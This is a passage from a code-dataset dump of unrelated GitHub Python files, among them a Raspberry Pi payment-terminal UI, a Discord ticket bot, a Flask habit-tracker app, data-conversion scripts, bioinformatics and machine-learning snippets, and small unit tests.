aw = AmountWindow(self.disp)\n aw.show()\n amount = aw.getAmount(self.keypad)\n if not (0.01 <= amount <= 50000.00):\n raise UserError(\"Ongeldig brag\")\n print(\"Amount = {0}\".format(amount))\n pw = PinWindow(self.disp, amount)\n pw.show()\n 
print(\"entering reading card\")\n cardId = ReadCard(self.pn532)\n print(\"CardId = {0}\".format(cardId))\n if cardId:\n pin = pw.getPin(self.keypad)\n print(\"Pin = {0}\".format(pin))\n token = getToken()\n print(\"Creating response!\")\n response = getPaymentResponse(token, amount, pin, cardId)\n print(\"Response: \" + '\\n' + str(response.text))\n while not response.status_code == 201:\n self.newImage()\n self.drawText(30, 10, 'TOT {0} EUR'.format(amount))\n if response.status_code == 401:\n print(response.text)\n if response.text == 'Unauthorized':\n token = getToken()\n response = getPaymentResponse(token, amount, pin, cardId)\n else:\n self.drawText(30, 30, 'Incorrect PIN.')\n self.disp.image(self.image)\n self.disp.display()\n time.sleep(3)\n pw.show()\n pin = pw.getPin(self.keypad)\n response = getPaymentResponse(token, amount, pin, cardId)\n elif response.status_code == 404:\n print(response.text)\n self.drawText(10, 30, 'Kaart niet herkend')\n self.disp.image(self.image)\n self.disp.display()\n time.sleep(3)\n pw.show()\n cardId = ReadCard(self.pn532)\n if cardId:\n pin = pw.getPin(self.keypad)\n response = getPaymentResponse(token, amount, pin, cardId)\n elif response.status_code == 429 or response.status_code == 403:\n raise UserError('Kaart geblokkeerd.')\n elif response.status_code == 400:\n raise UserError('Onvoldoende Saldo.')\n elif response.status_code == 403:\n raise UserError('Toegang geweigerd.')\n else:\n raise CancelError\n self.newImage()\n self.drawText(30, 10, 'TOT {0} EUR'.format(amount))\n self.drawText(40, 30, 'AKKOORD')\n self.disp.image(self.image)\n self.disp.display()\n else:\n raise NFCScanError\n\nclass SecureWindow(BaseWindow):\n\n def __init__(self, disp):\n super().__init__(disp)\n\n def show(self, cardId):\n self.drawText(20, 10, '{0}'.format(cardId))\n self.drawText(50, 30, 'Block?')\n self.drawText(5, 50, '* | NO')\n self.drawText(80, 50, '# | YES')\n self.disp.image(self.image)\n self.disp.display()\n\n def confirmBlock(self, keyPad, pn532):\n while True:\n self.newImage()\n pkey = keyPad.pressed_keys\n if pkey:\n time.sleep(0.5)\n if pkey[0] == '#':\n if SecureCard(pn532):\n self.drawText(45, 30, 'DONE')\n self.disp.image(self.image)\n self.Display()\n break\n elif pkey[0] == '*':\n self.drawText(45, 30, 'CANCELLED')\n self.disp.image(self.image)\n self.Display()\n break\n else:\n continue\n return\n\nclass BlockModeWindow(BaseWindow):\n\n def __init__(self, disp, pn532, keypad):\n self.pn532 = pn532\n self.keypad = keypad\n super().__init__(disp)\n\n def show(self, pn532):\n self.drawText(10, 30, 'Waiting for card...')\n self.Display()\n cardId = WriteCard(pn532)\n if cardId:\n self.newImage()\n self.drawText(10, 30, 'DONE')\n self.Display()\n sw = SecureWindow(self.disp)\n time.sleep(3)\n sw.show(cardId)\n sw.confirmBlock(self.keypad, self.pn532)\n else:\n raise\n\nclass DisplayError(BaseWindow):\n\n def __init__(self, disp, result):\n self.result = result\n super().__init__(disp)\n\n def show(self):\n self.draw.text((10, 30), self.result, font=self.font, fill=255)\n self.disp.image(self.image)\n self.disp.display()\n\n\n","repo_name":"anti-social-engineers/AceCardRaspPi","sub_path":"PL/Windows.py","file_name":"Windows.py","file_ext":"py","file_size_in_byte":8384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3409464183","text":"import discord\nimport cancel\nimport reserve\nimport pickledb\n\n\ndef split(word):\n return [char for char in word]\n\nclass 
completeButton(discord.ui.View):\n @discord.ui.button(style = discord.ButtonStyle.grey, label=\"Unreserve\")\n async def click_me_button(self, interaction: discord.Interaction, button: discord.ui.Button):\n db = pickledb.load('logiTicket.json', True)\n await interaction.response.defer() \n embedVar = interaction.message.embeds[0]\n embedVar.set_footer(text=\"All completion of tickets works on an honesty policy, please do not abuse the system\")\n msg = interaction.message\n ticketnum = int(embedVar.title.split(\" #\")[1].split(\":\")[0])\n dbContent = db.get(str(ticketnum)).split(\"//\")\n if dbContent[5] == str(interaction.user.id):\n del dbContent[5]\n dbContentConc=\"\"\n for i in range(len(dbContent)):\n dbContentConc = dbContentConc+dbContent[i]+\"//\"\n dbContentConc = dbContentConc+\"%<><>!\"\n db.set(str(ticketnum), dbContentConc.replace(\"//%<><>!\",\"\"))\n await msg.edit(embed=embedVar, view=reserve.reserveButton())\n \n @discord.ui.button(style = discord.ButtonStyle.green, label='Complete')\n async def click_me_button_2(self, interaction: discord.Interaction, button: discord.ui.Button):\n db = pickledb.load('logiTicket.json', True)\n ticketnum = int(interaction.message.embeds[0].title.split(\" #\")[1].split(\":\")[0])\n if str(interaction.user.id)==db.get(str(ticketnum)).split(\"//\")[5]:\n channel = interaction.channel\n message = \"<@\"+str(db.get(str(ticketnum)).split(\"//\")[0])+\"> ```Your Order (#\"+str(ticketnum)+\") was completed by: \"+interaction.user.display_name+\"```\"\n await channel.send(message)\n leaderboard = db.get(\"lb\")\n lb = leaderboard.split(\"//\")\n del lb[0]\n leaderboard=\"//\"\n x=0\n for i in range(len(lb)):\n if lb[i][0:18] == str(db.get(str(ticketnum)).split(\"//\")[5]):\n lbSplit=split(lb[i])\n score=\"\"\n for z in range(18, len(lbSplit)):\n score=score+lbSplit[z]\n score=str(int(score)+1)\n lbConc=\"\"\n for k in range(len(lbSplit)-len(split(score))):\n lbConc=lbConc+lbSplit[k]\n lbConc+=score\n lb[i]=lbConc\n print(lb[i])\n for i in range(len(lb)):\n leaderboard = leaderboard+lb[i]+\"//\"\n db.set(\"lb\", leaderboard.replace(\"////\",\"//\"))\n break\n else:\n x+=1\n if x == len(lb):\n db.set(\"lb\", db.get(\"lb\")+str(db.get(str(ticketnum)).split(\"//\")[5])+\"1//\")\n db.rem(str(ticketnum)) \n await interaction.message.delete()\n \n\n @discord.ui.button(style = discord.ButtonStyle.red, label='Cancel')\n async def click_me_button_3(self, interaction: discord.Interaction, button: discord.ui.Button):\n await cancel.interactionCancel(interaction) ","repo_name":"josh56432/LogiTicketRevamp2","sub_path":"complete.py","file_name":"complete.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22795648580","text":"#%%\nfrom pyspark.sql import SparkSession\nspark = SparkSession.builder.appName(\"VectorSizeHint\").master(\"local[*]\").getOrCreate()\nfrom pyspark.ml.linalg import Vectors\ndf = spark.createDataFrame([\n (Vectors.dense([-2.0, 2.3, 0.0, 0.0, 1.0]),),\n (Vectors.dense([0.0, 0.0, 0.0, 0.0, 0.0]),),\n (Vectors.dense([0.6, -1.1, -3.0, 4.5, 3.3]),)], [\"features\"])\n#%%\ndf.head(3)\n#%%\nfrom pyspark.ml.feature import VectorSlicer\nvs = VectorSlicer(inputCol=\"features\", outputCol=\"sliced\", indices=[1, 
4])\nvs.transform(df).head(3)\n#%%\nspark.stop()","repo_name":"Gadaite/Pyspark-ML-Kafka-Hadoop-","sub_path":"pyspark_ML/Feature_engineering/VectorSlicer_.py","file_name":"VectorSlicer_.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"34339549457","text":"import csv\nfrom dbfpy import dbf\nimport os\nimport xlrd\nimport glob\n\npath = \"/home/pwm4/Desktop/cg342/cleaned_raw_comparison/PVT/redo/clean/cleaned_data/dbf/\"\ncsv_path = \"/home/pwm4/Desktop/cg342/cleaned_raw_comparison/PVT/redo/clean/cleaned_data/dbf_csv/\"\n\nallfiles = glob.glob(path + \"*.DBF\")\n\nfor filepath in allfiles:\n## print(filepath)\n# \n filename = os.path.basename(os.path.splitext(filepath)[0])\n## print filename\n csv_file_name = csv_path + filename+ \".csv\"\n# print csv_file_name\n with open(csv_file_name,'wb') as csvfile:\n in_db = dbf.Dbf(filepath)\n out_csv = csv.writer(csvfile)\n names = []\n for field in in_db.header.fields:\n names.append(field.name)\n out_csv.writerow(names)\n for rec in in_db:\n out_csv.writerow(rec.fieldData)\n print(filename)\n in_db.close()\n\n###################\n#mainpath = r\"/home/pwm4/Desktop/cg342/cleaned_raw_comparison/KSS/KSS_cleaned/KSS_cleaned_data/DBF/\"\n#csv_path = r\"/home/pwm4/Desktop/cg342/cleaned_raw_comparison/KSS/KSS_cleaned/KSS_cleaned_csv/\"\n\n#for dirpath, dirnames, filenames in os.walk(mainpath):\n# \n# for filename in filenames:\n## print(\"filename \", filename)\n# if filename.endswith('.DBF'):\n# filepath = mainpath + filename\n# name_stripped = os.path.basename(os.path.splitext(filepath)[0])\n# file_to_write = csv_path + name_stripped + \".csv\"\n# with open(file_to_write,'wb') as csvfile:\n## print(filepath)\n## print(\"csvpath is: \\n\" + file_to_write) \n# print(\"filepath is .....\", filepath)\n# in_db = dbf.Dbf(filepath)\n## \n## out_csv = csv.writer(csvfile)\n## names = []\n## for field in in_db.header.fields:\n## names.append(field.name)\n## out_csv.writerow(names)\n## for rec in in_db:\n## out_csv.writerow(rec.fieldData)\n## in_db.close()\n## print(\"done\")\n\n","repo_name":"cg342/merge_cleaned_PVT","sub_path":"4_dbf_to_csv.py","file_name":"4_dbf_to_csv.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71356796094","text":"#-*- coding: utf-8 -*-\n\n'''\n4. Implementar um módulo com duas funções:\n ▪ split(fn, n), que quebra o arquivo fn em partes de n bytes e salva com\n nomes sequenciais (se fn = arq.txt, então arq_001.txt, arq_002.txt, ... 
)\n ▪ join(fn, fnlist) que junte os arquivos da lista fnlist em um arquivo só fn.\n'''\n\nfrom os.path import getsize\n\ndef join(fn, fnlist):\n file_out = open(fn, 'w')\n for filename in fnlist:\n file_in = open(filename, 'r')\n for line in file_in:\n file_out.write(line)\n file_in.close()\n file_out.close()\n\ndef split(fn, n):\n #depois olhar como criar exceção em python e se é possível para lançar uma\n #isso também surgiu na refatoração e está tarde!!!\n if n > getsize(fn):\n return #exceção?\n file_in = open(fn, 'r')\n file_counter = 0\n #lê n bytes do arquivo e seta o ponteiro de leitura onde ele termina a leitura\n n_bytes_string = file_in.read(n)\n while n_bytes_string != '':\n file_counter += 1\n file_out = open(fn[:-4] + '_%03d.txt' %file_counter, 'w')\n file_out.write(n_bytes_string)\n file_out.close()\n n_bytes_string = file_in.read(n)\n file_in.close()\n\nif __name__ == '__main__':\n join('arq_do_join.txt', ['arq_exerc_01.txt', 'arq_exerc_03.txt'])\n split('arq_grande.txt', 30)\n","repo_name":"berinhard/forkinrio_exercises","sub_path":"exercicios/parte_2/parte_2_4.py","file_name":"parte_2_4.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"2901559899","text":"#!/usr/bin/env python3\n\nimport unittest\n\nfrom notify_engine import (\n NotifyManager, EventLoopInterface, CommonEvent, EventInterface,\n)\n\nfrom notify_engine.notify_manager.events import (\n CommonEventSerialize, CommonPublishOpts,\n)\n\n\nclass myEvent(EventInterface, CommonEventSerialize, CommonPublishOpts):\n def __init__(self, message=None, additional=None):\n self.message = message\n self.additional = additional\n\n @staticmethod\n def event_type():\n return 'myEvent'\n\n\nclass EventLoop(EventLoopInterface):\n def __init__(self):\n self.subscribers = set()\n self.messages = list()\n\n def subscribe(self, handle):\n self.subscribers.add(handle)\n\n def publish(self, message):\n self.messages.append(message)\n\n def stop(self):\n return\n\n def _pop_message(self):\n while self.messages:\n m = self.messages.pop()\n yield m\n\n def run(self):\n for message in self._pop_message():\n for subscriber in self.subscribers:\n subscriber(message)\n\n\nclass TestNotifyManager(unittest.TestCase):\n def test_notify_manager(self):\n '''Test nofity manager subscribe/publish'''\n evl = EventLoop()\n nm = NotifyManager(evl, lambda task, event: task(event))\n\n test_message = 'test message 0081'\n additional_message = 'additional message 9240'\n\n ok = {\n 'called_common': False,\n 'called_my': False,\n }\n\n def task_common_handler(event):\n ok['called_common'] = True\n self.assertEqual(event.message, test_message)\n\n def task_my_handler(event):\n ok['called_my'] = True\n self.assertEqual(event.message, test_message)\n self.assertEqual(event.additional, additional_message)\n\n nm.publish(CommonEvent(test_message))\n nm.subscribe(CommonEvent, task_common_handler)\n nm.subscribe(myEvent, task_my_handler)\n\n nm.run()\n self.assertTrue(ok['called_common'])\n self.assertFalse(ok['called_my'])\n\n ok['called_common'] = False\n nm.run()\n self.assertFalse(ok['called_common'])\n self.assertFalse(ok['called_my'])\n \n nm.publish(myEvent(test_message, additional_message))\n nm.run()\n self.assertFalse(ok['called_common'])\n self.assertTrue(ok['called_my'])\n \n ok['called_my'] = False\n nm.publish(CommonEvent(test_message))\n nm.publish(myEvent(test_message, additional_message))\n nm.run()\n self.assertTrue(ok['called_common'])\n 
self.assertTrue(ok['called_my'])\n\n \nif __name__ == '__main__':\n unittest.main()\n","repo_name":"kloliks/notify_engine","sub_path":"tests/test_notify_manager.py","file_name":"test_notify_manager.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"5123693486","text":"import json\nimport re\nfrom random import shuffle\n\nfrom botocore.vendored import requests\n\n\ndef crawl(search_term='Drake'):\n INFO_REGEX = rb'\\s*([^<]+)'\n URL = \"https://www.google.ro/search?q={}\".format(search_term)\n\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n }\n\n response = requests.get(URL, headers=headers)\n response_content = response.content\n output = []\n results = re.findall(INFO_REGEX, response_content)\n if results:\n for result in results:\n output.append({\n \"url\": result[0].decode(\"utf-8\"),\n \"snippet\": result[1].decode(\"utf-8\"),\n })\n first_results = output[:5]\n other_results = output[5:]\n shuffle(other_results)\n\n return first_results + other_results\n\n\ndef lambda_handler(event, context):\n return {\n 'statusCode': 200,\n 'headers': {'Content-Type': 'application/json'},\n # 'body': json.dumps(event['queryStringParameters'])\n 'body': json.dumps(crawl(event['queryStringParameters']['query']))\n }\n","repo_name":"lupusilviu95/Gingo","sub_path":"aws/lamzi/google/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14820826156","text":"from enum import Enum\nfrom enum import unique\n\n\n@unique\nclass TokenType(Enum):\n OpenBrace = \"{\"\n CloseBrace = \"}\"\n StringLiteral = \"StringLiteral\"\n COLON = \":\"\n QUOTE = '\"'\n NUMBER = \"NUMBER\"\n COMMA = \",\"\n NIL = \"NIL\"\n EOF = \"EOF\"\n TRUE = \"true\"\n FALSE = 'false'\n\n\n# @unique\n# class KeyWorks(Enum):\n# true = TokenType.TRUE\n# false = TokenType.FALSE\n\n\nclass Token:\n def __init__(self, jtype, value):\n \"\"\"\n :param jtype:\n :param value:\n \"\"\"\n self.jtype = jtype\n self.value = value\n","repo_name":"EurusEurus/json-parser","sub_path":"mode1/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32819516628","text":"import pandas as pd\nimport numpy as np\n\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.svm import SVC\n\nfrom sklearn.model_selection import train_test_split, GridSearchCV\n\nfrom sklearn.metrics import classification_report, accuracy_score\n\ndef read_train(file_name='../input/train.csv'):\n print('Reading in training set...')\n train_df = pd.read_csv(file_name)\n print('Training set dimensionality: (%i, %i).\\n' % train_df.shape)\n\n return train_df\n\ndef read_test(file_name='../input/'):\n print('Reading in testing set...')\n test_df = pd.read_csv('input/test.csv')\n print('Testing set dimensionality: (%i, %i).\\n' % test_df.shape)\n\n return test_df\n\nprint('Performing SVC prediction...')\nprint('Training...')\n\ndef param_select(X, y):\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=13)\n print('Training set shape:', X_train.shape, 
y_train.shape)\n print('Testing set shape:', X_test.shape, y_test.shape)\n\n parameters = {\n 'kernel': ['linear'],\n 'C': [20, 1, 0.5]\n }\n\n print('Tuning hyper-parameters...')\n selector = GridSearchCV(SVC(), parameters, scoring='accuracy')\n selector.fit(X_train, y_train)\n\n print('Best parameter set found on development set:')\n print(selector.best_params_)\n print('Grid scores on development set:')\n means = selector.cv_results_['mean_test_score']\n stds = selector.cv_results_['std_test_score']\n for mean, std, params in zip(means, stds, selector.cv_results_['params']):\n print('%0.3f (+/-%0.03f) for %r' % (mean, std * 2, params))\n print()\n\n print('Detailed classification report:')\n print(\"The model is trained on the full development set.\")\n print(\"The scores are computed on the full evaluation set.\")\n y_true = y_test\n y_pred = selector.predict(X_test)\n print(classification_report(y_true, y_pred))\n\ndef predict(clf):\n test_df = read_test()\n X_test, y_test = test_df.iloc[:, 0:len(test_df.columns) -1], test_df.iloc[:, -1]\n\n print('Predicting...')\n y_pred = clf.predict(X_test)\n print('Accuracy score:', accuracy_score(y_test, y_pred))\n\nif __name__ == '__main__':\n train_df = read_train()\n X, y = train_df.iloc[:, 0:len(train_df.columns) - 1], train_df.iloc[:, -1]\n\n param_select(X, y)\n\n #clf = SVC(kernel='linear', C=1).fit(X, y)\n #predict(clf)\n","repo_name":"vijji0555/Activity-Recognition","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9668682520","text":"import sys\n\nimport airfoil\n\nif len(sys.argv) < 2:\n print('Usage:')\n print(' python3 {} '.format(sys.argv[0]))\n sys.exit(0)\n\ninputdir = sys.argv[1]\n\ntry:\n a = airfoil.Airfoil(inputdir)\nexcept RuntimeError as e:\n print('ERROR: {}'.format(e))\n sys.exit(2)\n\nprint(a)\n","repo_name":"chechaohp/researchdeep","sub_path":"courses/cme211/cme211-jongminyoon/hw3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"14673473250","text":"# server.py\n\nimport eventlet\nimport socketio\n\nsio = socketio.Server()\napp = socketio.WSGIApp(sio)\n\n\n@sio.on('connect')\ndef connect(sid, environ):\n print('new client connected ', sid)\n\n\n@sio.on('message')\ndef message(sid, message):\n print('new message ', message)\n sio.emit(\"message\", message)\n\n\n@sio.on('disconnect')\ndef disconnect(sid):\n print('client disconnect ', sid)\n\nif __name__ == '__main__':\n eventlet.wsgi.server(eventlet.listen(('', 5000)), app)\n","repo_name":"SultanKs4/kuliah","sub_path":"Python/Project using virtualenv/web socket/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74340270336","text":"def get_context(lineno, context_line, pre_context=None, post_context=None):\n if lineno is None:\n return []\n\n if context_line is None and not (pre_context or post_context):\n return []\n\n lineno = int(lineno)\n context = []\n start_lineno = lineno - len(pre_context or [])\n if pre_context:\n start_lineno = lineno - len(pre_context)\n at_lineno = start_lineno\n for line in pre_context:\n context.append([at_lineno, line])\n at_lineno += 1\n else:\n start_lineno = lineno\n at_lineno = lineno\n\n if start_lineno < 0:\n start_lineno = 
0\n\n context.append([at_lineno, context_line])\n at_lineno += 1\n\n if post_context:\n for line in post_context:\n context.append([at_lineno, line])\n at_lineno += 1\n\n return context\n","repo_name":"diwaperkasa/glitchtip","sub_path":"code/sentry/interfaces/stacktrace.py","file_name":"stacktrace.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6142980382","text":"\n\ndef allindices(string, sub, offset=0):\n listindex=[]\n i = string.find(sub, offset)\n while i >= 0:\n listindex.append(i)\n i = string.find(sub, i + 1)\n return listindex\n \n\ndef findTranscriptsWithSTOPCodonsIn5PrimeUTRSequence(options,gene_info):\n \"\"\"\n Finds transcripts with STOP codons in 5' UTR sequences\n \"\"\"\n transcripts_to_in_frame_STOP_codon_locations_in_5_prime_UTR_region={}\n fhr=open(options.transcriptome,\"r\")\n for line in fhr:\n if \">\" in line:\n transcript_id=line.strip().split()[0][1:]\n if transcript_id not in gene_info:continue\n #start,end=int(line.strip().split(\"CDS=\")[-1].split(\"-\")[0]),int(line.strip().split(\"CDS=\")[-1].split(\"-\")[-1])\n start,end=gene_info[transcript_id][\"cds_start\"],gene_info[transcript_id][\"cds_end\"]\n seq=fhr.readline().strip()\n five_prime_UTR_region=seq[:start-1]\n if len(five_prime_UTR_region) % 3 == 1:\n five_prime_UTR_region=five_prime_UTR_region[1:]\n dropped=1\n elif len(five_prime_UTR_region) % 3 == 2:\n five_prime_UTR_region=five_prime_UTR_region[2:]\n dropped=2\n else:\n dropped=0\n locations_of_TAA=allindices(five_prime_UTR_region,\"TAA\")\n locations_of_TAG=allindices(five_prime_UTR_region,\"TAG\")\n locations_of_TGA=allindices(five_prime_UTR_region,\"TGA\")\n locations_of_TAA_in_frame_with_CDS_check=[x%3 for x in locations_of_TAA]\n locations_of_TAG_in_frame_with_CDS_check=[x%3 for x in locations_of_TAG]\n locations_of_TGA_in_frame_with_CDS_check=[x%3 for x in locations_of_TGA]\n if dropped==1:\n locations_of_TAA_in_frame_with_CDS=[loc+1+1 for num,loc in enumerate(locations_of_TAA) if locations_of_TAA_in_frame_with_CDS_check[num]==0]\n locations_of_TAG_in_frame_with_CDS=[loc+1+1 for num,loc in enumerate(locations_of_TAG) if locations_of_TAG_in_frame_with_CDS_check[num]==0]\n locations_of_TGA_in_frame_with_CDS=[loc+1+1 for num,loc in enumerate(locations_of_TGA) if locations_of_TGA_in_frame_with_CDS_check[num]==0]\n elif dropped==2:\n locations_of_TAA_in_frame_with_CDS=[loc+2+1 for num,loc in enumerate(locations_of_TAA) if locations_of_TAA_in_frame_with_CDS_check[num]==0]\n locations_of_TAG_in_frame_with_CDS=[loc+2+1 for num,loc in enumerate(locations_of_TAG) if locations_of_TAG_in_frame_with_CDS_check[num]==0]\n locations_of_TGA_in_frame_with_CDS=[loc+2+1 for num,loc in enumerate(locations_of_TGA) if locations_of_TGA_in_frame_with_CDS_check[num]==0]\n else:\n locations_of_TAA_in_frame_with_CDS=[loc+1 for num,loc in enumerate(locations_of_TAA) if locations_of_TAA_in_frame_with_CDS_check[num]==0]\n locations_of_TAG_in_frame_with_CDS=[loc+1 for num,loc in enumerate(locations_of_TAG) if locations_of_TAG_in_frame_with_CDS_check[num]==0]\n locations_of_TGA_in_frame_with_CDS=[loc+1 for num,loc in enumerate(locations_of_TGA) if locations_of_TGA_in_frame_with_CDS_check[num]==0]\n all_locations=[]\n all_locations.extend(locations_of_TAA_in_frame_with_CDS)\n all_locations.extend(locations_of_TAG_in_frame_with_CDS)\n all_locations.extend(locations_of_TGA_in_frame_with_CDS)\n 
transcripts_to_in_frame_STOP_codon_locations_in_5_prime_UTR_region[transcript_id]=sorted(all_locations)\n    fhr.close()\n    return transcripts_to_in_frame_STOP_codon_locations_in_5_prime_UTR_region","repo_name":"Wiselab2/NGPINT","sub_path":"scripts/detectTranscriptsWithSTOPCodonsIn5PrimeUTRSequence.py","file_name":"detectTranscriptsWithSTOPCodonsIn5PrimeUTRSequence.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"6954332804","text":"import json\n\n\nclass CreateRecipesMap():\n    def __init__(self, inputFileName, outputFileName):\n        self.inputFileName = inputFileName\n        self.outputFileName = outputFileName\n\n    def createMap(self):\n        with open(self.inputFileName, \"r\") as read_file:\n            data = json.load(read_file)\n\n\n\n        recipes = {}\n        for i in data:\n            for j in i['results']:\n                recipes[j[\"_id\"]] = j['_source']\n\n\n\n\n        # write the output file \n        f = open(self.outputFileName, 'w')\n        f.write(json.dumps(recipes))\n\n        return","repo_name":"RodrigoFelixgithub/culinary-assistant","sub_path":"createRecipesMap.py","file_name":"createRecipesMap.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"75005073854","text":"from collections import deque\r\n\r\nadj_list = [[1], [4, 3], [1, 0],\r\n            [6], [5], [7, 3], [7], [8], []]\r\nn = len(adj_list)\r\nin_degree = [1,2,0,2,1,1,1,2,1]\r\n\r\n\r\ndef tsort():\r\n    result = [] # list that stores the topological-sort result\r\n    queue = deque() \r\n\r\n    # find every vertex whose in-degree is 0 and put it in the queue.\r\n    for i in range(0, n):\r\n        if in_degree[i] == 0:\r\n            queue.append(i)\r\n    \r\n    # take one vertex out of the queue; that one becomes now!\r\n    while queue:\r\n        # visit one vertex!\r\n        now = queue.popleft()\r\n        result.append(now) \r\n\r\n        # decrease by 1 the in-degree of every vertex in the adjacency list of the vertex just visited.\r\n        for i in adj_list[now]:\r\n            in_degree[i] -= 1\r\n            # a vertex whose in-degree drops to 0 still has to be visited, so put it in the queue.\r\n            if in_degree[i] == 0:\r\n                queue.append(i)\r\n        # once the in-degrees of the neighbors of the visited vertex have been updated \r\n        # and the queue additions are done,\r\n        # the next iteration of the while loop moves on and visits the next vertex.\r\n        \r\n    print(result)\r\n\r\ntsort()","repo_name":"rudgh4493/ProblemSolving","sub_path":"0926/lecture/tsort2.py","file_name":"tsort2.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"19013788248","text":"import cv2\nimport usingCamera as mnSSDm\n\ncap = cv2.VideoCapture(0)\ncap.set(3,640)\ncap.set(4,480)\nmyModel = mnSSDm.mnSSD(\"ssd-mobilenet-v2\", 0.5)\nwhile True:\n\tsuccess, img = cap.read()\n\tobjects = myModel.detect(img, True)\n\n\tcv2.imshow(\"Image\", img)\n\tcv2.waitKey(1)\n","repo_name":"estelelenath/ProjectAsurada","sub_path":"Code/usingCamera/project_Test.py","file_name":"project_Test.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"38701632033","text":"import segmenter\nfrom iBlocs import *\n\nclass Module_ib(segmenter.Segmenter):\n    def __init__(self, context):\n        self._context = context\n\n    def __call__(self, document):\n        self.process(document)\n        return document\n\n    def process(self,document):\n        # Retrieve the content\n        text = document.getContent()\n        # Find the blocks and get back a list of (level, begin, stop)\n        listeBlocs = trouveBlocs(text)\n\n        # Make a segment for each block,\n        # except block 0, which is in fact the whole document\n        for b in listeBlocs:\n            if b[0] == 0:\n                continue\n            start = b[1]\n            segmentLength = b[2] 
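# --- Editor's note: sketch of the allindices() helper defined earlier. It
# advances the search position one character at a time, so it also reports
# overlapping occurrences of the substring; the inputs are illustrative.
assert allindices("ATAATAA", "TAA") == [1, 4]
assert allindices("TTTT", "TT") == [0, 1, 2]  # overlapping matches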
- b[1]\n document.addSegment(start,segmentLength)\n","repo_name":"divyaabc/pypometre","sub_path":"documentSegmenters/mod_ib.py","file_name":"mod_ib.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"28020551153","text":"from flask import Blueprint, render_template, request, flash, redirect, url_for\r\nfrom flask_login import login_required, current_user\r\nimport datetime\r\n\r\n\r\nviews = Blueprint('views', __name__)\r\n\r\n\r\n@views.route('/')\r\n@login_required\r\ndef home():\r\n from .models import Tracker\r\n from . import db\r\n user = current_user.id\r\n from .models import Tracker, Log\r\n tracker = db.session.query(Tracker).with_entities(\r\n Tracker.name, Tracker.id, Tracker.description).distinct().filter(Tracker.uid == user).all()\r\n logs = db.session.query(Log).with_entities(\r\n Log.id).distinct().filter(Log.uid == user).all()\r\n print(tracker)\r\n\r\n return render_template(\"home.html\", user=current_user, tracker=tracker, tracker_count=len(tracker), log_count=len(logs))\r\n\r\n\r\n@views.route('/add-tracker', methods=['GET', 'POST'])\r\n@login_required\r\ndef add_tracker():\r\n if request.method == \"GET\":\r\n from . import db\r\n from .models import Tracker\r\n user = current_user.id\r\n tracker = db.session.query(Tracker).with_entities(\r\n Tracker.name, Tracker.id, Tracker.description).distinct().filter(Tracker.uid == user).all()\r\n return render_template(\"addtracker.html\", user=current_user, tracker=tracker, tracker_count=len(tracker))\r\n if request.method == 'POST':\r\n name = request.form['name']\r\n type = request.form['Action']\r\n settings = request.form['settings']\r\n description = request.form['description']\r\n\r\n from .models import Tracker\r\n\r\n tracker = Tracker.query.filter_by(name=name).first()\r\n user = current_user.id\r\n\r\n if tracker and user == tracker.uid:\r\n flash('The tracker \"' + name + '\" already exists', category='error')\r\n return redirect(url_for('views.add_tracker'))\r\n else:\r\n from . import db\r\n tracker_info = Tracker(\r\n name=name, description=description, type=type, settings=settings, uid=user)\r\n db.session.add(tracker_info)\r\n db.session.commit()\r\n flash(name + ' Tracker Added', category='success')\r\n return redirect(url_for('views.home'))\r\n\r\n\r\n@views.route('/delete-tracker/', methods=['GET', 'POST'])\r\n@login_required\r\ndef delete_tracker(tid):\r\n from .models import Tracker\r\n tracker = Tracker.query.get(tid)\r\n from . import db\r\n db.session.delete(tracker)\r\n db.session.commit()\r\n flash(tracker.name + ' Tracker Removed Successfully.', 